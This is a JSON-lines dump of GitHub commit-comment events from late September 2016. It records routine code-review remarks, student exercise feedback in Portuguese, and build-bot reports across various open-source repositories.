{"id":"4628185767","type":"CommitCommentEvent","actor":{"login":"Wardiman-PA"},"repo":{"name":"Wardiman-PA/Hi-Dunia"},"payload":{"comment":{"id":19201337,"position":2,"line":0,"path":"README.md","commit_id":"ac7052a121ed5dd1f2bbc3ae38ba47e85f7528cc","created_at":"2016-09-28T02:47:22Z","updated_at":"2016-09-28T02:47:22Z","body":"Wardiman"}},"created_at":"2016-09-28T02:47:22Z"}
{"id":"4628186561","type":"CommitCommentEvent","actor":{"login":"NSLogMeng"},"repo":{"name":"SnapKit/SnapKit"},"payload":{"comment":{"id":19201339,"position":null,"line":null,"path":null,"commit_id":"5c7ede844a7e190de05a1b14311c378358ea61c0","created_at":"2016-09-28T02:47:40Z","updated_at":"2016-09-28T02:47:40Z","body":"This change is because used 10.11 api, firstbaseline?"}},"created_at":"2016-09-28T02:47:40Z"}
{"id":"4628186773","type":"CommitCommentEvent","actor":{"login":"raven02"},"repo":{"name":"RPCS3/rpcs3"},"payload":{"comment":{"id":19201340,"position":null,"line":null,"path":null,"commit_id":"4f74cbe5103b83cb88a9d03433bd312a7ce4c27a","created_at":"2016-09-28T02:47:44Z","updated_at":"2016-09-28T02:47:44Z","body":"@fenix008  , please open issue .Thanks ."}},"created_at":"2016-09-28T02:47:44Z"}
{"id":"4628192155","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201347,"position":8,"line":8,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"0af37ddb48f253f14b190b9bda712cba02cc4cc7","created_at":"2016-09-28T02:49:39Z","updated_at":"2016-09-28T02:49:39Z","body":"Cuidado indentação do código.\r\n\r\nNote que o cliente não pediu nada sobre \"deixar o valor zero caso a quantidade seja igual ou inferior a zero\", ou \"deixar o valor 100 quando a quantidade for igual ou superior a 100\". Simplifique!"}},"created_at":"2016-09-28T02:49:39Z"}
{"id":"4628193268","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201349,"position":24,"line":24,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"0af37ddb48f253f14b190b9bda712cba02cc4cc7","created_at":"2016-09-28T02:50:05Z","updated_at":"2016-09-28T02:50:05Z","body":"pode retornar direto:\r\n\r\n```Java\r\nreturn quantidadeDeLembas > 2 && quantidadeDeLembas % 2 == 0;\r\n```"}},"created_at":"2016-09-28T02:50:05Z"}
{"id":"4628193984","type":"CommitCommentEvent","actor":{"login":"pkleckner"},"repo":{"name":"mosh-hamedani/angular2-course"},"payload":{"comment":{"id":19201355,"position":35,"line":44,"path":"app/user-form.component.ts","commit_id":"29bbb8b2d8961321557f487c1b6203d1ce500280","created_at":"2016-09-28T02:50:19Z","updated_at":"2016-09-28T02:50:19Z","body":"Alternatively, you can add a boolean variable to the code to see if the form is Saving.\r\n\r\nFor example, just before the constructor:\r\nisSaving = false;\r\n\r\nIn \"routerCanDeactivate\", change the if statement to:\r\nif (this.form.dirty && this.isSaving = false)\r\n\r\nAnd at the end of the save() function, add in:\r\nthis.isSaving = true;"}},"created_at":"2016-09-28T02:50:19Z"}
{"id":"4628196248","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201361,"position":15,"line":15,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembasTest.java","commit_id":"962c29b072253d32a6b22fee05787e6db2876ff0","created_at":"2016-09-28T02:51:06Z","updated_at":"2016-09-28T02:51:06Z","body":"Pode fazer direto:\r\n\r\n```Java\r\nassertFalse(cesta.podeDividirEmPares());\r\n```"}},"created_at":"2016-09-28T02:51:06Z"}
{"id":"4628197732","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201383,"position":2,"line":2,"path":"src/modulo-01-java-OO/modulo-01/Dwarve.java","commit_id":"3842ad38f8779b77f6dca68458fdaa6bded92eca","created_at":"2016-09-28T02:51:38Z","updated_at":"2016-09-28T02:51:38Z","body":"Cuidado, o nome da classe solicitado no texto do exercício é outro."}},"created_at":"2016-09-28T02:51:38Z"}
{"id":"4628198081","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201387,"position":5,"line":5,"path":"src/modulo-01-java-OO/modulo-01/Dwarve.java","commit_id":"3842ad38f8779b77f6dca68458fdaa6bded92eca","created_at":"2016-09-28T02:51:46Z","updated_at":"2016-09-28T02:51:46Z","body":"cliente não pediu isto."}},"created_at":"2016-09-28T02:51:46Z"}
{"id":"4628198135","type":"CommitCommentEvent","actor":{"login":"martinthomson"},"repo":{"name":"ietf-wg-acme/acme"},"payload":{"comment":{"id":19201388,"position":null,"line":null,"path":null,"commit_id":"2258367a139a08796e9c712ca223db604b7495c2","created_at":"2016-09-28T02:51:47Z","updated_at":"2016-09-28T02:51:47Z","body":"That's why it's SHOULD NOT - you can include trust anchors if you aren't certain that clients that depend on the chain have them.  Self-signed doesn't allow you to (for example) omit a cross-signed root, even when you are reasonably certain that this is what is in trust stores."}},"created_at":"2016-09-28T02:51:47Z"}
{"id":"4628198568","type":"CommitCommentEvent","actor":{"login":"chiangyiyang"},"repo":{"name":"chiangyiyang/test"},"payload":{"comment":{"id":19201390,"position":null,"line":null,"path":null,"commit_id":"7b4c1e0f2dfa6af4253b5038c29b0cea8c105781","created_at":"2016-09-28T02:51:57Z","updated_at":"2016-09-28T02:51:57Z","body":"wweqweqweqw"}},"created_at":"2016-09-28T02:51:57Z"}
{"id":"4628200556","type":"CommitCommentEvent","actor":{"login":"byang8"},"repo":{"name":"byang8/helloWorld"},"payload":{"comment":{"id":19201396,"position":2,"line":2,"path":"README.md","commit_id":"25cf8965d07e68fba512bb540baee4f94692f80e","created_at":"2016-09-28T02:52:41Z","updated_at":"2016-09-28T02:52:41Z","body":"// initialize hello world\r\nSystem.out.println(\"Hello World\");"}},"created_at":"2016-09-28T02:52:41Z"}
{"id":"4628200853","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201398,"position":10,"line":10,"path":"src/modulo-01-java-OO/modulo-01/Dwarve.java","commit_id":"3842ad38f8779b77f6dca68458fdaa6bded92eca","created_at":"2016-09-28T02:52:47Z","updated_at":"2016-09-28T02:52:47Z","body":"Cliente não pediu que um Dwarf tenha nome."}},"created_at":"2016-09-28T02:52:47Z"}
{"id":"4628201308","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201400,"position":18,"line":18,"path":"src/modulo-01-java-OO/modulo-01/Dwarve.java","commit_id":"3842ad38f8779b77f6dca68458fdaa6bded92eca","created_at":"2016-09-28T02:52:56Z","updated_at":"2016-09-28T02:52:56Z","body":"Cliente não pediu isto."}},"created_at":"2016-09-28T02:52:56Z"}
{"id":"4628201910","type":"CommitCommentEvent","actor":{"login":"NSLogMeng"},"repo":{"name":"SnapKit/SnapKit"},"payload":{"comment":{"id":19201401,"position":null,"line":null,"path":null,"commit_id":"5c7ede844a7e190de05a1b14311c378358ea61c0","created_at":"2016-09-28T02:53:09Z","updated_at":"2016-09-28T02:53:09Z","body":"My project is support 10.10, i saw you wrap the snapkit api by @available(), could i change deployment_target to 10.10 to customize in my project?"}},"created_at":"2016-09-28T02:53:09Z"}
{"id":"4628202666","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201402,"position":null,"line":null,"path":null,"commit_id":"3842ad38f8779b77f6dca68458fdaa6bded92eca","created_at":"2016-09-28T02:53:26Z","updated_at":"2016-09-28T02:53:26Z","body":"@LeonardoAlmeida96 \r\n\r\nSugiro que simplifique o código e deixe apenas aquilo que o exercício pedir, para evitar fazer coisas a mais que o necessário, e aquilo que é necessário talvez não ser bem feito."}},"created_at":"2016-09-28T02:53:26Z"}
{"id":"4628203444","type":"CommitCommentEvent","actor":{"login":"Fangrim"},"repo":{"name":"MidKnightMadness/2016-2017-Season"},"payload":{"comment":{"id":19201405,"position":99,"line":99,"path":"TeamCode/src/main/java/org/tka/robotics/VuforiaNavigation.java","commit_id":"d99110174f4c2186c1c8179517894747e51307a7","created_at":"2016-09-28T02:53:43Z","updated_at":"2016-09-28T02:53:43Z","body":"that didn't work so well at the meeting"}},"created_at":"2016-09-28T02:53:43Z"}
{"id":"4628205537","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201414,"position":null,"line":null,"path":null,"commit_id":"47c9143e3afacb7b68d3db4a7563619777866bfc","created_at":"2016-09-28T02:54:27Z","updated_at":"2016-09-28T02:54:27Z","body":"Por isso é perigoso inventar coisas que o cliente não solicitou. Nenhum destes testes retrata a regra que o cliente pediu: Dwarf nasce com 110 de vida."}},"created_at":"2016-09-28T02:54:27Z"}
{"id":"4628213855","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201432,"position":40,"line":29,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"a91b71c65fc95de6c5eafb27f6fee8296e5d0713","created_at":"2016-09-28T02:57:38Z","updated_at":"2016-09-28T02:57:38Z","body":"Não foi solicitado pelo cliente informar a quantidade de flechas a serem atiradas no Dwarf. Remover esta funcionalidade."}},"created_at":"2016-09-28T02:57:38Z"}
{"id":"4628214454","type":"CommitCommentEvent","actor":{"login":"tyyyt"},"repo":{"name":"tyyyt/hell"},"payload":{"comment":{"id":19201433,"position":null,"line":null,"path":null,"commit_id":"f7cf0254bb45eb0870885999f96819c6ef2d6e94","created_at":"2016-09-28T02:57:52Z","updated_at":"2016-09-28T02:57:52Z","body":"hello .this is  a useless "}},"created_at":"2016-09-28T02:57:52Z"}
{"id":"4628216751","type":"CommitCommentEvent","actor":{"login":"cmcinnis"},"repo":{"name":"cmcinnis/java-rpg"},"payload":{"comment":{"id":19201438,"position":null,"line":null,"path":null,"commit_id":"9efb127bbb048d19f093639e127af1f0bedebcca","created_at":"2016-09-28T02:58:46Z","updated_at":"2016-09-28T02:58:46Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Initial project setup](https://trello.com/c/Ka6f89QZ/1-initial-project-setup)"}},"created_at":"2016-09-28T02:58:46Z"}
{"id":"4628218044","type":"CommitCommentEvent","actor":{"login":"QuantumSpark"},"repo":{"name":"ubclaunchpad/RocketCast"},"payload":{"comment":{"id":19201441,"position":13,"line":13,"path":"RocketCast/CoreDataHelper.swift","commit_id":"4dbbedc23126cdc2e19eabf0b3659501a2b3fb4e","created_at":"2016-09-28T02:59:13Z","updated_at":"2016-09-28T02:59:13Z","body":"This is only being used once, so I am going to leave it here "}},"created_at":"2016-09-28T02:59:13Z"}
{"id":"4628218047","type":"CommitCommentEvent","actor":{"login":"cmcinnis"},"repo":{"name":"cmcinnis/java-rpg"},"payload":{"comment":{"id":19201442,"position":null,"line":null,"path":null,"commit_id":"173fd78866151999fa2cbc527fade56473f2f940","created_at":"2016-09-28T02:59:13Z","updated_at":"2016-09-28T02:59:13Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Initial project setup](https://trello.com/c/Ka6f89QZ/1-initial-project-setup)"}},"created_at":"2016-09-28T02:59:13Z"}
{"id":"4628218481","type":"CommitCommentEvent","actor":{"login":"pRivAte12"},"repo":{"name":"HandDev/SendUAndroid"},"payload":{"comment":{"id":19201444,"position":null,"line":null,"path":null,"commit_id":"2812bfb4777d65e0d7038b04de25d139f59f4447","created_at":"2016-09-28T02:59:23Z","updated_at":"2016-09-28T02:59:23Z","body":"Add OrderFragment에서 사용안하는 parameter들은 제거해주세요 ㅜㅜ"}},"created_at":"2016-09-28T02:59:23Z"}
{"id":"4628219043","type":"CommitCommentEvent","actor":{"login":"cmcinnis"},"repo":{"name":"cmcinnis/java-rpg"},"payload":{"comment":{"id":19201449,"position":null,"line":null,"path":null,"commit_id":"72fd6ee03b3e3105973d317dcc5c76fed85d5367","created_at":"2016-09-28T02:59:36Z","updated_at":"2016-09-28T02:59:36Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Initial project setup](https://trello.com/c/Ka6f89QZ/1-initial-project-setup)"}},"created_at":"2016-09-28T02:59:36Z"}
{"id":"4628219048","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19201450,"position":null,"line":null,"path":null,"commit_id":"e5ab0940f7fc1ced4c80848c91ee0b356ce8afee","created_at":"2016-09-28T02:59:36Z","updated_at":"2016-09-28T02:59:36Z","body":"license-update (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2366 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5ab0940f7fc1ced4c80848c91ee0b356ce8afee-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5ab0940f7fc1ced4c80848c91ee0b356ce8afee-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.65%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T02:59:36Z"}
{"id":"4628219183","type":"CommitCommentEvent","actor":{"login":"jose9706"},"repo":{"name":"CursosIE/IE-0217-II-16-G2"},"payload":{"comment":{"id":19201451,"position":null,"line":null,"path":null,"commit_id":"59b97ba38cb9e07cef2d8d40fb14a123bc94bfa8","created_at":"2016-09-28T02:59:39Z","updated_at":"2016-09-28T02:59:39Z","body":"Diagrama de Clases UML"}},"created_at":"2016-09-28T02:59:39Z"}
{"id":"4628219275","type":"CommitCommentEvent","actor":{"login":"cmcinnis"},"repo":{"name":"cmcinnis/java-rpg"},"payload":{"comment":{"id":19201453,"position":null,"line":null,"path":null,"commit_id":"173fd78866151999fa2cbc527fade56473f2f940","created_at":"2016-09-28T02:59:41Z","updated_at":"2016-09-28T02:59:41Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Initial project setup](https://trello.com/c/Ka6f89QZ/1-initial-project-setup)"}},"created_at":"2016-09-28T02:59:41Z"}
{"id":"4628219318","type":"CommitCommentEvent","actor":{"login":"QuantumSpark"},"repo":{"name":"ubclaunchpad/RocketCast"},"payload":{"comment":{"id":19201454,"position":20,"line":20,"path":"RocketCast/CoreDataHelper.swift","commit_id":"4dbbedc23126cdc2e19eabf0b3659501a2b3fb4e","created_at":"2016-09-28T02:59:42Z","updated_at":"2016-09-28T02:59:42Z","body":"no this has to be like this and I will explain why on Saturday"}},"created_at":"2016-09-28T02:59:42Z"}
{"id":"4628219464","type":"CommitCommentEvent","actor":{"login":"cmcinnis"},"repo":{"name":"cmcinnis/java-rpg"},"payload":{"comment":{"id":19201456,"position":null,"line":null,"path":null,"commit_id":"9efb127bbb048d19f093639e127af1f0bedebcca","created_at":"2016-09-28T02:59:46Z","updated_at":"2016-09-28T02:59:46Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Initial project setup](https://trello.com/c/Ka6f89QZ/1-initial-project-setup)"}},"created_at":"2016-09-28T02:59:46Z"}
{"id":"4628219903","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":19201457,"position":35,"line":104,"path":"website/server/controllers/api-v3/chat.js","commit_id":"6726855b7d3850d2d1eab344f48ce3c98824c39b","created_at":"2016-09-28T02:59:55Z","updated_at":"2016-09-28T02:59:55Z","body":"If we're going to call it `checkChatSpam`, the method itself should throw the error.\r\n\r\nIf you want it to be a boolean, a better name would probably be `group.isUserSpamming(user)`\r\n\r\nI have a slight preference for `checkChatSpam`"}},"created_at":"2016-09-28T02:59:55Z"}
{"id":"4633026892","type":"CommitCommentEvent","actor":{"login":"filran"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19213601,"position":16,"line":16,"path":"Assets/Scripts/ThreeDUMLAPI/ClassAttribute.cs","commit_id":"22966aeb45b085f6f3b83b31a29f246b08e9dabe","created_at":"2016-09-28T20:00:05Z","updated_at":"2016-09-28T20:00:05Z","body":"Está no README.md.\n\nSe vc fez mudanças, deve testar e publicar.\n\n\nAtt,\nFilipe Arantes Fernandes\n\n2016-09-28 16:58 GMT-03:00 Filipe Arantes <filran@gmail.com>:\n\n> Perigoso isso! Eu publique um overview das classes e seus relacionamentos.\n> Vamos nos atentar de forma que fique naquele design.\n>\n>\n> Att,\n> Filipe Arantes Fernandes\n>\n> On Wed, Sep 28, 2016 at 4:35 PM, William Lacerda <notifications@github.com\n> > wrote:\n>\n>> Então, eu tentei com ela, porém Attribute.cs não puxa de IXmlNode, e\n>> quando eu fiz puxar, deu conflito com a implementação de algumas coisas que\n>> você fez, então preferi criar uma nova\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/filran/VisAr3D-Dynamic-Ultimate/commit/22966aeb45b085f6f3b83b31a29f246b08e9dabe#commitcomment-19213246>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ACkN0RvwVtagUblwVPnSYxIgI8hA-x7Nks5qusF2gaJpZM4KJN_1>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-28T20:00:05Z"}
{"id":"4633027806","type":"CommitCommentEvent","actor":{"login":"jessesquires"},"repo":{"name":"SwiftWeekly/swiftweekly.github.io"},"payload":{"comment":{"id":19213604,"position":null,"line":null,"path":null,"commit_id":"3517102c1c586a909e985cc05d58518e3ced26c8","created_at":"2016-09-28T20:00:14Z","updated_at":"2016-09-28T20:00:14Z","body":":ok_hand: :clap:"}},"created_at":"2016-09-28T20:00:14Z"}
{"id":"4633059629","type":"CommitCommentEvent","actor":{"login":"alsemyonov"},"repo":{"name":"VKCOM/vk-api-schema"},"payload":{"comment":{"id":19213672,"position":5,"line":4275,"path":"responses.json","commit_id":"b2d53f698f283c1846906cdecefb77efa56660b6","created_at":"2016-09-28T20:05:47Z","updated_at":"2016-09-28T20:05:47Z","body":"You fixed a typo with another typo. This line should be: `\"$ref\": \"objects.json#/definitions/messages_last_activity\"`."}},"created_at":"2016-09-28T20:05:47Z"}
{"id":"4633065470","type":"CommitCommentEvent","actor":{"login":"faustinoaq"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":19213686,"position":null,"line":null,"path":null,"commit_id":"a20f45ac2feb35ed3f54ac71df53bc369f18a333","created_at":"2016-09-28T20:06:50Z","updated_at":"2016-09-28T20:06:50Z","body":"@asterite thanks you for fix this issue! 👍 #3178 "}},"created_at":"2016-09-28T20:06:50Z"}
{"id":"4633068284","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-2-SanderElsen"},"payload":{"comment":{"id":19213699,"position":null,"line":null,"path":null,"commit_id":"0df2c31361f5b9a725169dce40962b08a30cd633","created_at":"2016-09-28T20:07:21Z","updated_at":"2016-09-28T20:07:21Z","body":"Hoe werkt dat eigenlijk, injecteert spring-mvc _altijd_ een `HttpServletResponse` als ge dat op een `@RequestMapping` meegeeft?\r\n\r\nKheb het zelf anders opgelost, ma ik moet daarvoor de return type aanpassen. Dus dit is op zich wel een interessante oplossing ook.\r\n\r\nCool!"}},"created_at":"2016-09-28T20:07:21Z"}
{"id":"4633069215","type":"CommitCommentEvent","actor":{"login":"uar-edin-pjanic"},"repo":{"name":"guda/learningLibrary"},"payload":{"comment":{"id":19213701,"position":4,"line":25,"path":"src/test/java/com/lli/rel/Lms.java","commit_id":"411f388c0e1063814d999e9a430066281115fdf9","created_at":"2016-09-28T20:07:30Z","updated_at":"2016-09-28T20:07:30Z","body":"@ribich88 nice one, LGTM"}},"created_at":"2016-09-28T20:07:30Z"}
{"id":"4633069857","type":"CommitCommentEvent","actor":{"login":"almereyda"},"repo":{"name":"indiehosters/nginx"},"payload":{"comment":{"id":19213702,"position":53,"line":16,"path":"docker-compose.yml","commit_id":"0af5279a0fafd9f53d5ebec7226b404589fa9e02","created_at":"2016-09-28T20:07:37Z","updated_at":"2016-09-28T20:07:37Z","body":"There was a problem at https://github.com/jwilder/nginx-proxy/issues/479#issuecomment-227234655 with `-only-exposed`. This is resolved now and works properly also with it?"}},"created_at":"2016-09-28T20:07:37Z"}
{"id":"4633069896","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19213703,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-28T20:07:38Z","updated_at":"2016-09-28T20:07:38Z","body":"develop (evanweaver) - Win64-Windows-7-VisualStudio-12: OK (2410 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.45%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T20:07:38Z"}
{"id":"4633077924","type":"CommitCommentEvent","actor":{"login":"jeffkaufman"},"repo":{"name":"pagespeed/mod_pagespeed"},"payload":{"comment":{"id":19213715,"position":null,"line":null,"path":null,"commit_id":"da1cdeec3f851912743c9eb754e7674dd7f546b8","created_at":"2016-09-28T20:09:04Z","updated_at":"2016-09-28T20:09:04Z","body":"@yeputons "}},"created_at":"2016-09-28T20:09:04Z"}
{"id":"4633080286","type":"CommitCommentEvent","actor":{"login":"almereyda"},"repo":{"name":"indiehosters/nginx"},"payload":{"comment":{"id":19213721,"position":null,"line":null,"path":null,"commit_id":"95ee0464301a2cbff1d57905f0e88278c95ebad3","created_at":"2016-09-28T20:09:30Z","updated_at":"2016-09-28T20:09:30Z","body":"I consider pasting the file directly to the git tree not as a long-term solution, as we are not using tagged image releases in the compose file."}},"created_at":"2016-09-28T20:09:30Z"}
{"id":"4633082539","type":"CommitCommentEvent","actor":{"login":"andrewrk"},"repo":{"name":"ofelas/zigtest"},"payload":{"comment":{"id":19213723,"position":null,"line":null,"path":null,"commit_id":"4d4cbbe597b25fd95e32ef1b414f2af26a81e0cc","created_at":"2016-09-28T20:09:54Z","updated_at":"2016-09-28T20:09:54Z","body":"ooh very interesting"}},"created_at":"2016-09-28T20:09:54Z"}
{"id":"4633083911","type":"CommitCommentEvent","actor":{"login":"jeffkaufman"},"repo":{"name":"pagespeed/mod_pagespeed"},"payload":{"comment":{"id":19213730,"position":195,"line":218,"path":"pagespeed/system/redis_cache_cluster_test.cc","commit_id":"75fb7f5a261674c0107b25cd97f4d6f530e601e1","created_at":"2016-09-28T20:10:09Z","updated_at":"2016-09-28T20:10:09Z","body":"da1cdeec3f851912743c9eb754e7674dd7f546b8 fixes this TODO via TestCaseSetup"}},"created_at":"2016-09-28T20:10:09Z"}
{"id":"4633089396","type":"CommitCommentEvent","actor":{"login":"MASHinfo"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19213743,"position":null,"line":null,"path":null,"commit_id":"b27bc184b3e81a71253a6f92a180ec206db65b70","created_at":"2016-09-28T20:11:08Z","updated_at":"2016-09-28T20:11:08Z","body":"Should\r\nCONS( 198?, istreb,...\r\nbe\r\nGAME( 198?, istreb,..."}},"created_at":"2016-09-28T20:11:08Z"}
{"id":"4633093649","type":"CommitCommentEvent","actor":{"login":"krasilich"},"repo":{"name":"piknikdid/project2"},"payload":{"comment":{"id":19213760,"position":15,"line":66,"path":"index.html","commit_id":"34cc238668c2cbefb21b29b4ab5a8dca4e8358eb","created_at":"2016-09-28T20:11:54Z","updated_at":"2016-09-28T20:11:54Z","body":"Зачем тебе эта переменная?\r\nУ тебя в intervalID либо есть значение либо нет, собственно его и проверяй)"}},"created_at":"2016-09-28T20:11:54Z"}
{"id":"4633095024","type":"CommitCommentEvent","actor":{"login":"christophehurpeau"},"repo":{"name":"christophehurpeau/pob-commit"},"payload":{"comment":{"id":19213763,"position":39,"line":39,"path":"prepare-commit-msg.js","commit_id":"da045177da9421ece64f5d07822766fc5b0022ef","created_at":"2016-09-28T20:12:10Z","updated_at":"2016-09-28T20:12:10Z","body":"non, tu peux faire return reject(new Error('...'))"}},"created_at":"2016-09-28T20:12:10Z"}
{"id":"4633095351","type":"CommitCommentEvent","actor":{"login":"krasilich"},"repo":{"name":"piknikdid/project2"},"payload":{"comment":{"id":19213764,"position":27,"line":76,"path":"index.html","commit_id":"34cc238668c2cbefb21b29b4ab5a8dca4e8358eb","created_at":"2016-09-28T20:12:13Z","updated_at":"2016-09-28T20:12:13Z","body":"ну и тут intervalID = 0"}},"created_at":"2016-09-28T20:12:13Z"}
{"id":"4633096463","type":"CommitCommentEvent","actor":{"login":"DJJelli23"},"repo":{"name":"DJJelli23/Bootstrap-Training"},"payload":{"comment":{"id":19213771,"position":null,"line":null,"path":null,"commit_id":"745aa57b64b600d7ed3db3547bc69381fe04db91","created_at":"2016-09-28T20:12:26Z","updated_at":"2016-09-28T20:12:26Z","body":"Just Do It!"}},"created_at":"2016-09-28T20:12:26Z"}
{"id":"4633097003","type":"CommitCommentEvent","actor":{"login":"christophehurpeau"},"repo":{"name":"christophehurpeau/pob-commit"},"payload":{"comment":{"id":19213773,"position":39,"line":39,"path":"prepare-commit-msg.js","commit_id":"da045177da9421ece64f5d07822766fc5b0022ef","created_at":"2016-09-28T20:12:31Z","updated_at":"2016-09-28T20:12:31Z","body":"par contre faut rajouter le traitement de l'erreur qqpart"}},"created_at":"2016-09-28T20:12:31Z"}
{"id":"4633097230","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19213775,"position":null,"line":null,"path":null,"commit_id":"23f82af6429d34b15ae9a2ebcc787141d2d1db13","created_at":"2016-09-28T20:12:34Z","updated_at":"2016-09-28T20:12:34Z","body":"The following doc(s) have been deployed to the [peterpanth](https://peterpanth-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/new-relic](https://peterpanth-static-docs.pantheonsite.io/docs/new-relic)\n"}},"created_at":"2016-09-28T20:12:34Z"}
{"id":"4633098044","type":"CommitCommentEvent","actor":{"login":"DVDAndroid"},"repo":{"name":"DVDAndroid/XposedInstaller"},"payload":{"comment":{"id":19213780,"position":null,"line":null,"path":null,"commit_id":"390c58df0de4036739bbcf74385e629fca6457aa","created_at":"2016-09-28T20:12:43Z","updated_at":"2016-09-28T20:12:43Z","body":"[xposed://com.ceco.marshmallow.gravitybox](xposed://com.ceco.marshmallow.gravitybox)"}},"created_at":"2016-09-28T20:12:43Z"}
{"id":"4633098691","type":"CommitCommentEvent","actor":{"login":"JaredNinja"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19213786,"position":null,"line":null,"path":null,"commit_id":"fccee7d488989d86c6a339ae7dd505904fbdfff7","created_at":"2016-09-28T20:12:50Z","updated_at":"2016-09-28T20:12:50Z","body":"Awesome job!"}},"created_at":"2016-09-28T20:12:50Z"}
{"id":"4633103908","type":"CommitCommentEvent","actor":{"login":"christophehurpeau"},"repo":{"name":"christophehurpeau/pob-commit"},"payload":{"comment":{"id":19213805,"position":39,"line":39,"path":"prepare-commit-msg.js","commit_id":"da045177da9421ece64f5d07822766fc5b0022ef","created_at":"2016-09-28T20:13:49Z","updated_at":"2016-09-28T20:13:49Z","body":"```js\r\n.catch((err) => {\r\nconsole.log(err.message || err);\r\nprocess.exit(1);\r\n})\r\n```"}},"created_at":"2016-09-28T20:13:49Z"}
{"id":"4633104430","type":"CommitCommentEvent","actor":{"login":"TheBr0ken"},"repo":{"name":"TrlteNougat/manifest"},"payload":{"comment":{"id":19213809,"position":4,"line":457,"path":"default.xml","commit_id":"1181b6fcf9fb5d7d9057fff6a350f80068e1fcf7","created_at":"2016-09-28T20:13:55Z","updated_at":"2016-09-28T20:13:55Z","body":"You need to adjust this path to external/stagefright-plugins"}},"created_at":"2016-09-28T20:13:55Z"}
{"id":"4633107167","type":"CommitCommentEvent","actor":{"login":"IsaiahPatton"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":19213818,"position":null,"line":null,"path":null,"commit_id":"c52d5d7a7a02cf50db04bbbc5cf18e65f657c199","created_at":"2016-09-28T20:14:24Z","updated_at":"2016-09-28T20:14:24Z","body":"its not System.getProperty(\"file.separator\") its just File.separator"}},"created_at":"2016-09-28T20:14:24Z"}
{"id":"4633108888","type":"CommitCommentEvent","actor":{"login":"gaearon"},"repo":{"name":"insin/nwb"},"payload":{"comment":{"id":19213825,"position":22,"line":22,"path":"tasks/release.js","commit_id":"ffc39bfe26e8d1feaf0bc539df91d6bcec220306","created_at":"2016-09-28T20:14:44Z","updated_at":"2016-09-28T20:14:44Z","body":"I swear I saw this code somewhere 😄 "}},"created_at":"2016-09-28T20:14:44Z"}
